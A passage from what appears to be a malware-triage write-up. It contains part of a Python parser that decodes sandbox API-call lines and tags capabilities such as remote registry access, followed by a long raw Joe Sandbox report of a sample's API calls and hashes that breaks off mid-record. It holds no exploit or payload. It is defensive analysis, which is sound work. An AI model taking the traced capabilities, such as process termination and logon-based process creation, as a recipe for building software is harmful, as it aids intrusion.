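    0x0111: "WM_COMMAND",
    WM_USER + 1: "PBM_SETRANGE",
    WM_USER + 2: "PBM_SETPOS",
    WM_USER + 4: "PBM_SETSTEP",
    WM_USER + 9: "PBM_SETBARCOLOR",
    0x2001: "PBM_SETBKCOLOR",   # same value as CCM_SETBKCOLOR
}


def describe_message(call: ApiCall) -> Optional[str]:
    """Name the message of a SendMessageW/PostMessageW call; decode PBM_SETRANGE's lParam."""
    if call.api not in ("SendMessageW", "PostMessageW") or len(call.args) < 2:
        return None
    msg = call.args[1]
    if not isinstance(msg, int):
        return None
    name = MSG_NAMES.get(msg, f"0x{msg:04X}")
    if name == "PBM_SETRANGE" and len(call.args) > 3 and isinstance(call.args[3], int):
        lo, hi = call.args[3] & 0xFFFF, (call.args[3] >> 16) & 0xFFFF
        return f"{name}({lo}, {hi})"
    return name


# Illustrative grouping; extend to taste for real triage.
CAPABILITIES = {
    "registry_enum": {"RegConnectRegistryW", "RegOpenKeyExW", "RegEnumValueW", "RegEnumKeyExW"},
    "remote_registry": {"RegConnectRegistryW"},
    "dynamic_import": {"GetProcAddress", "LoadLibraryExW", "LoadLibraryW"},
}


def capabilities(calls: List[ApiCall]) -> Dict[str, List[str]]:
    seen = {c.api for c in calls}
    return {tag: sorted(seen & apis) for tag, apis in CAPABILITIES.items() if seen & apis}


# Constructed from lines on this page.
SAMPLE = """\
  • Part of subcall function 00BC1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BC1D73
  • Part of subcall function 00BC1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BC1D91
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00C47632
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00C4763F
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00C4764A
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00C47659
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00C47665
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C402BD
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C402FD
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C40349
• SysAllocString.OLEAUT32 ref: 00C1DC53
• GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00BE9EB4
"""

if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for c in parsed:
        print(f"{c.ref:08X} {c.api}.{c.module} {describe_message(c) or ''}")
    print(capabilities(parsed))
```

The `-00000001` in the `RegEnumValueW` line is the report's rendering of a signed immediate; `int(tok, 16)` keeps the sign, so the record shows the index is not a fixed value. Note that `FF000000` is `CLR_DEFAULT`, so the two colour messages reset the control to default colours rather than painting it.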
                                                  APIs
                                                  • GetMenu.USER32(?), ref: 00C457FB
                                                  • GetMenuItemCount.USER32(00000000), ref: 00C45832
                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00C4585A
                                                  • GetMenuItemID.USER32(?,?), ref: 00C458C9
                                                  • GetSubMenu.USER32(?,?), ref: 00C458D7
                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 00C45928
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Menu$Item$CountMessagePostString
                                                  • String ID:
                                                  • API String ID: 650687236-0
                                                  • Opcode ID: 9142857c9f643ca83f03d248cc472e2966fe2c23ac56c00aec7afeb2ff9bbaa0
                                                  • Instruction ID: 9b55d8314ef2fe66897888e5531e30b0b97739ab127e24e68ce301d47cee7275
                                                  • Opcode Fuzzy Hash: 9142857c9f643ca83f03d248cc472e2966fe2c23ac56c00aec7afeb2ff9bbaa0
                                                  • Instruction Fuzzy Hash: 2D514A35E00615EFDF11AF64C845AAEB7F4FF49720F1040A9E851AB292CB70AE429B90
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 00C1EF06
                                                  • VariantClear.OLEAUT32(00000013), ref: 00C1EF78
                                                  • VariantClear.OLEAUT32(00000000), ref: 00C1EFD3
                                                  • _memmove.LIBCMT ref: 00C1EFFD
                                                  • VariantClear.OLEAUT32(?), ref: 00C1F04A
                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C1F078
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Variant$Clear$ChangeInitType_memmove
                                                  • String ID:
                                                  • API String ID: 1101466143-0
                                                  • Opcode ID: b52a5f61b131117ac461dede7ee622dc1233f17f39d52edf903896911544d6dc
                                                  • Instruction ID: f6442fb7149ef627e7f0591da0633967fa11753f42bc1cb45577a31afff26ab0
                                                  • Opcode Fuzzy Hash: b52a5f61b131117ac461dede7ee622dc1233f17f39d52edf903896911544d6dc
                                                  • Instruction Fuzzy Hash: 2B5158B5A00209EFCB14CF58C884AAAB7F8FF4D314B158569ED59DB301E734E952CBA0
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C22258
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C222A3
                                                  • IsMenu.USER32(00000000), ref: 00C222C3
                                                  • CreatePopupMenu.USER32 ref: 00C222F7
                                                  • GetMenuItemCount.USER32(000000FF), ref: 00C22355
                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00C22386
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                  • String ID:
                                                  • API String ID: 3311875123-0
                                                  • Opcode ID: eb6068b1029ccc759d7d4f46fbd0050fbadc8bab613ae8c9ef72262bead3e128
                                                  • Instruction ID: fa23f09e838211a0a6b9b8aff031c59eba7cfa711cb3abcbbd7a3cf1dc7cb8a8
                                                  • Opcode Fuzzy Hash: eb6068b1029ccc759d7d4f46fbd0050fbadc8bab613ae8c9ef72262bead3e128
                                                  • Instruction Fuzzy Hash: FA51D170600269FFDF21CF68E988BAEBBF9FF05314F104129E861976A0D3788A04CB51
                                                  APIs
                                                    • Part of subcall function 00BC2612: GetWindowLongW.USER32(?,000000EB), ref: 00BC2623
                                                  • BeginPaint.USER32(?,?,?,?,?,?), ref: 00BC179A
                                                  • GetWindowRect.USER32(?,?), ref: 00BC17FE
                                                  • ScreenToClient.USER32(?,?), ref: 00BC181B
                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00BC182C
                                                  • EndPaint.USER32(?,?), ref: 00BC1876
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                  • String ID:
                                                  • API String ID: 1827037458-0
                                                  • Opcode ID: bcb4e2f753822709387fce5a33a6fb0f8bd8c66ba67c972198f6ca846429a897
                                                  • Instruction ID: 3f6d4aa2b8f7bf0858610580db1f5e78a4bead56305cbbda0d15041c779890f9
                                                  • Opcode Fuzzy Hash: bcb4e2f753822709387fce5a33a6fb0f8bd8c66ba67c972198f6ca846429a897
                                                  • Instruction Fuzzy Hash: D0419D75504200AFD710DF28CC84FBA7BE8FB46724F044AADFAA4972A2D7709845DB61
                                                  APIs
                                                  • ShowWindow.USER32(00C857B0,00000000,00EE54C8,?,?,00C857B0,?,00C4B5A8,?,?), ref: 00C4B712
                                                  • EnableWindow.USER32(00000000,00000000), ref: 00C4B736
                                                  • ShowWindow.USER32(00C857B0,00000000,00EE54C8,?,?,00C857B0,?,00C4B5A8,?,?), ref: 00C4B796
                                                  • ShowWindow.USER32(00000000,00000004,?,00C4B5A8,?,?), ref: 00C4B7A8
                                                  • EnableWindow.USER32(00000000,00000001), ref: 00C4B7CC
                                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00C4B7EF
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$Show$Enable$MessageSend
                                                  • String ID:
                                                  • API String ID: 642888154-0
                                                  • Opcode ID: ac82a4e1628e33bc37b8d354c638a8317fad7459d2501b3ef35a74a9c8394739
                                                  • Instruction ID: 22726b193dfff070671819cad2c43da57ff73a631e1b0b9f580153cf07acf274
                                                  • Opcode Fuzzy Hash: ac82a4e1628e33bc37b8d354c638a8317fad7459d2501b3ef35a74a9c8394739
                                                  • Instruction Fuzzy Hash: EC417C34600240AFDB26CF28C599B957BE1FF45310F1841B9FA688F6A2C731ED56CB60
                                                  APIs
                                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,00C34E41,?,?,00000000,00000001), ref: 00C370AC
                                                    • Part of subcall function 00C339A0: GetWindowRect.USER32(?,?), ref: 00C339B3
                                                  • GetDesktopWindow.USER32 ref: 00C370D6
                                                  • GetWindowRect.USER32(00000000), ref: 00C370DD
                                                  • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00C3710F
                                                    • Part of subcall function 00C25244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C252BC
                                                  • GetCursorPos.USER32(?), ref: 00C3713B
                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C37199
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                  • String ID:
                                                  • API String ID: 4137160315-0
                                                  • Opcode ID: 4f324104c3d12c6857e86afc6547952e1ab7d81d01111ff59022113e4e09e3f4
                                                  • Instruction ID: 94fe77a2cc3bce77674c47bf2fed3e6e5b4e2add74f3c8d54c25e4af419e0097
                                                  • Opcode Fuzzy Hash: 4f324104c3d12c6857e86afc6547952e1ab7d81d01111ff59022113e4e09e3f4
                                                  • Instruction Fuzzy Hash: 8F31D272509305ABD720DF14D849F9FB7E9FF89314F000A19F59997191C670EA09CB92
                                                  APIs
                                                    • Part of subcall function 00C180A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C180C0
                                                    • Part of subcall function 00C180A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C180CA
                                                    • Part of subcall function 00C180A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C180D9
                                                    • Part of subcall function 00C180A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C180E0
                                                    • Part of subcall function 00C180A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C180F6
                                                  • GetLengthSid.ADVAPI32(?,00000000,00C1842F), ref: 00C188CA
                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C188D6
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00C188DD
                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 00C188F6
                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00C1842F), ref: 00C1890A
                                                  • HeapFree.KERNEL32(00000000), ref: 00C18911
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                  • String ID:
                                                  • API String ID: 3008561057-0
                                                  • Opcode ID: 80cea82bac760b03703c5914ed8a87b9c7719cdb337c8fcad48b6b47659cbfd9
                                                  • Instruction ID: ad43750df9bbe243dc0ef3348e011a3c91d0ca8e49c79badaa9acb954e9596d0
                                                  • Opcode Fuzzy Hash: 80cea82bac760b03703c5914ed8a87b9c7719cdb337c8fcad48b6b47659cbfd9
                                                  • Instruction Fuzzy Hash: 7311AF35505209FFDB109FA4DC09BFE77A8FB46315F10406DE89597210CB329A89EB60
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C185E2
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00C185E9
                                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C185F8
                                                  • CloseHandle.KERNEL32(00000004), ref: 00C18603
                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C18632
                                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 00C18646
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                  • String ID:
                                                  • API String ID: 1413079979-0
                                                  • Opcode ID: 962b22a14ae9e756a18740b1ac3391bd799562df2c7610f28b63195b06ed3209
                                                  • Instruction ID: 612c5b8b9041edcfb7c008ed3995949bcb92e818101c7084926556b9027093ce
                                                  • Opcode Fuzzy Hash: 962b22a14ae9e756a18740b1ac3391bd799562df2c7610f28b63195b06ed3209
                                                  • Instruction Fuzzy Hash: 24117976504109AFDF128FA4DC48BEE7BA9FF4A314F044069FE04A2160C7768E65EB20
                                                  APIs
                                                  • GetDC.USER32(00000000), ref: 00C1B7B5
                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00C1B7C6
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C1B7CD
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00C1B7D5
                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C1B7EC
                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 00C1B7FE
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CapsDevice$Release
                                                  • String ID:
                                                  • API String ID: 1035833867-0
                                                  • Opcode ID: d7173afb9f32750a1ab11eb641a16cf0255125b559de6c4f5cd94e01951eb41c
                                                  • Instruction ID: 901c9e4ec2bc96fa074646c0c1ea22396297cd57b655e52de49d2e5dd26ca9cb
                                                  • Opcode Fuzzy Hash: d7173afb9f32750a1ab11eb641a16cf0255125b559de6c4f5cd94e01951eb41c
                                                  • Instruction Fuzzy Hash: EA018475E00319BBEB109BB69C45B9EBFB8EB49351F044079FA08E7291D6309D01CFA0
                                                  APIs
                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BE0193
                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00BE019B
                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BE01A6
                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BE01B1
                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00BE01B9
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BE01C1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Virtual
                                                  • String ID:
                                                  • API String ID: 4278518827-0
                                                  • Opcode ID: efaf6043bc9331b27e6ae5d8d8e8a61b5f8578ee4d8981e5161ab3b4f8107534
                                                  • Instruction ID: 9829d7a59d40cef3fffefbee2e23cb85e9988208bed0977eeb657fffc48c5676
                                                  • Opcode Fuzzy Hash: efaf6043bc9331b27e6ae5d8d8e8a61b5f8578ee4d8981e5161ab3b4f8107534
                                                  • Instruction Fuzzy Hash: B60148B09027597DE3008F5A8C85B56FEA8FF19354F00411BA15847941C7B5A868CBE5
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C253F9
                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C2540F
                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00C2541E
                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C2542D
                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C25437
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C2543E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                  • String ID:
                                                  • API String ID: 839392675-0
                                                  • Opcode ID: 38cdf3a0e95b172e8dd780e34aed3c2a4aac42308c9ce26a7a06ce3e344b759e
                                                  • Instruction ID: 8df405144f5de7abe8034495b974888ed9c647894a716931a57f1aecc9315e6e
                                                  • Opcode Fuzzy Hash: 38cdf3a0e95b172e8dd780e34aed3c2a4aac42308c9ce26a7a06ce3e344b759e
                                                  • Instruction Fuzzy Hash: 17F01D36641558BBE7215BA29C0DFEF7A7CFBC7B11F00016DFA04D106196A11A0286B5
                                                  APIs
                                                  • InterlockedExchange.KERNEL32(?,?), ref: 00C27243
                                                  • EnterCriticalSection.KERNEL32(?,?,00BD0EE4,?,?), ref: 00C27254
                                                  • TerminateThread.KERNEL32(00000000,000001F6,?,00BD0EE4,?,?), ref: 00C27261
                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00BD0EE4,?,?), ref: 00C2726E
                                                    • Part of subcall function 00C26C35: CloseHandle.KERNEL32(00000000,?,00C2727B,?,00BD0EE4,?,?), ref: 00C26C3F
                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C27281
                                                  • LeaveCriticalSection.KERNEL32(?,?,00BD0EE4,?,?), ref: 00C27288
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                  • String ID:
                                                  • API String ID: 3495660284-0
                                                  • Opcode ID: 89a77ecfd9e48f0831644c0135da9c72f938562c0f306356d0bde8aa44daa4f7
                                                  • Instruction ID: 344c77e5e09d34ae0f5676822ca4027679487fa5de1bd8e510f7466c295b7d76
                                                  • Opcode Fuzzy Hash: 89a77ecfd9e48f0831644c0135da9c72f938562c0f306356d0bde8aa44daa4f7
                                                  • Instruction Fuzzy Hash: 9DF05E3A540612EBE7212B64ED8CBDF7769FF46702B100639F503914A1CBB65912CB60
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C1899D
                                                  • UnloadUserProfile.USERENV(?,?), ref: 00C189A9
                                                  • CloseHandle.KERNEL32(?), ref: 00C189B2
                                                  • CloseHandle.KERNEL32(?), ref: 00C189BA
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00C189C3
                                                  • HeapFree.KERNEL32(00000000), ref: 00C189CA
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                  • String ID:
                                                  • API String ID: 146765662-0
                                                  • Opcode ID: f66d5c506a8e8cf3b58264b13c60e80850ee8c6c1c26f258378fc94e5c03ef4f
                                                  • Instruction ID: 2959ec77d237cef1798e0cd7cb7b8b05b8089c7ea6a786a62965060cbffe3acf
                                                  • Opcode Fuzzy Hash: f66d5c506a8e8cf3b58264b13c60e80850ee8c6c1c26f258378fc94e5c03ef4f
                                                  • Instruction Fuzzy Hash: EEE0527A104505FBDA021FE5EC0CB5EBBA9FB8A762B508639F21981470CB329462DB50
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 00C38613
                                                  • CharUpperBuffW.USER32(?,?), ref: 00C38722
                                                  • VariantClear.OLEAUT32(?), ref: 00C3889A
                                                    • Part of subcall function 00C27562: VariantInit.OLEAUT32(00000000), ref: 00C275A2
                                                    • Part of subcall function 00C27562: VariantCopy.OLEAUT32(00000000,?), ref: 00C275AB
                                                    • Part of subcall function 00C27562: VariantClear.OLEAUT32(00000000), ref: 00C275B7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
